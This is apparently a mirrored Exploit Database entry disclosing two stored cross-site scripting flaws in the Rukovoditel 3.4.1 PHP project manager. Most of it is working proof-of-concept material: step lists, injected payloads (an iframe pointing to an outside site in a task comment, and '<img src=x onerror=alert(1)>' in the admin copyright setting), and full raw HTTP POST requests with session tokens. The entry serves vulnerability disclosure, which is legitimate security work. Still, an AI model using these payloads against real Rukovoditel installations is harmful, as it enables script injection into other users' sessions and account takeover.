Rukovoditel 3.4.1 – Multiple Stored XSS

• Exploit Database
• 137 阅读

• 作者： Mirabbas Ağalarov
  日期： 2023-07-03
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51548/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153

  Exploit Title: Rukovoditel 3.4.1 - Multiple Stored XSS Version: 3.4.1 Bugs:Multiple Stored XSS Technology: PHP Vendor URL: https://www.rukovoditel.net/ Software Link: https://www.rukovoditel.net/download.php Date of found: 24-06-2023 Author: Mirabbas Ağalarov Tested on: Linux     2. Technical Details & POC ======================================== ###XSS-1### ======================================== steps: 1. login to account 2. create project (http://localhost/index.php?module=items/items&path=21) 3. add task 4. open task 5. add comment as "<iframe src="https://14.rs"></iframe> "     POST /index.php?module=items/comments&action=save&token=FEOZ9jeKuA HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 241 Origin: http://localhost Connection: close Referer: http://localhost/index.php?module=items/info&path=21-2/22-1&redirect_to=subentity&gotopage[74]=1 Cookie: cookie_test=please_accept_for_session; sid=vftrl4mhmbvdbrvfmb0rb54vo5 Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1   form_session_token=FEOZ9jeKuA&path=21-2%2F22-1&fields%5B169%5D=47&fields%5B170%5D=53&fields%5B174%5D=3&description=%3Ciframe+src%3D%22https%3A%2F%2F14.rs%22%3E%3C%2Fiframe%3E+&uploadifive_attachments_upload_attachments=&comments_attachments=   =========================== ###XSS-2### =========================== 1.go to admin account 2.go to configration => applicaton 3.Copyright Text set as "<img src=x onerror=alert(1)>"     POST /index.php?module=configuration/save&redirect_to=configuration/application HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------12298384558648010343132232769 Content-Length: 2766 Origin: http://localhost Connection: close Referer: http://localhost/index.php?module=configuration/application Cookie: cookie_test=please_accept_for_session; sid=vftrl4mhmbvdbrvfmb0rb54vo5 Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1   -----------------------------12298384558648010343132232769 Content-Disposition: form-data; name="form_session_token"   ju271AAoy1 -----------------------------12298384558648010343132232769 Content-Disposition: form-data; name="CFG[APP_NAME]"   Rukovoditel -----------------------------12298384558648010343132232769 Content-Disposition: form-data; name="CFG[APP_SHORT_NAME_MOBILE]"   ffgsdfgsdfg -----------------------------12298384558648010343132232769 Content-Disposition: form-data; name="CFG[APP_SHORT_NAME]"   ruko -----------------------------12298384558648010343132232769 Content-Disposition: form-data; name="APP_LOGO"; filename="" Content-Type: application/octet-stream     -----------------------------12298384558648010343132232769 Content-Disposition: form-data; name="CFG[APP_LOGO]"     -----------------------------12298384558648010343132232769 Content-Disposition: form-data; name="CFG[APP_LOGO_URL]"     -----------------------------12298384558648010343132232769 Content-Disposition: form-data; name="APP_FAVICON"; filename="" Content-Type: application/octet-stream     -----------------------------12298384558648010343132232769 Content-Disposition: form-data; name="CFG[APP_FAVICON]"     -----------------------------12298384558648010343132232769 Content-Disposition: form-data; name="CFG[APP_COPYRIGHT_NAME]"   <img src=x onerror=alert(1)> -----------------------------12298384558648010343132232769 Content-Disposition: form-data; name="CFG[APP_LANGUAGE]"   english.php -----------------------------12298384558648010343132232769 Content-Disposition: form-data; name="CFG[APP_SKIN]"     -----------------------------12298384558648010343132232769 Content-Disposition: form-data; name="CFG[APP_TIMEZONE]"   America/New_York -----------------------------12298384558648010343132232769 Content-Disposition: form-data; name="CFG[APP_ROWS_PER_PAGE]"   10 -----------------------------12298384558648010343132232769 Content-Disposition: form-data; name="CFG[APP_DATE_FORMAT]"   m/d/Y -----------------------------12298384558648010343132232769 Content-Disposition: form-data; name="CFG[APP_DATETIME_FORMAT]"   m/d/Y H:i -----------------------------12298384558648010343132232769 Content-Disposition: form-data; name="CFG[APP_NUMBER_FORMAT]"   2/./* -----------------------------12298384558648010343132232769 Content-Disposition: form-data; name="CFG[APP_FIRST_DAY_OF_WEEK]"   0 -----------------------------12298384558648010343132232769 Content-Disposition: form-data; name="CFG[DROP_DOWN_MENU_ON_HOVER]"   0 -----------------------------12298384558648010343132232769 Content-Disposition: form-data; name="CFG[DISABLE_CHECK_FOR_UPDATES]"   0 -----------------------------12298384558648010343132232769--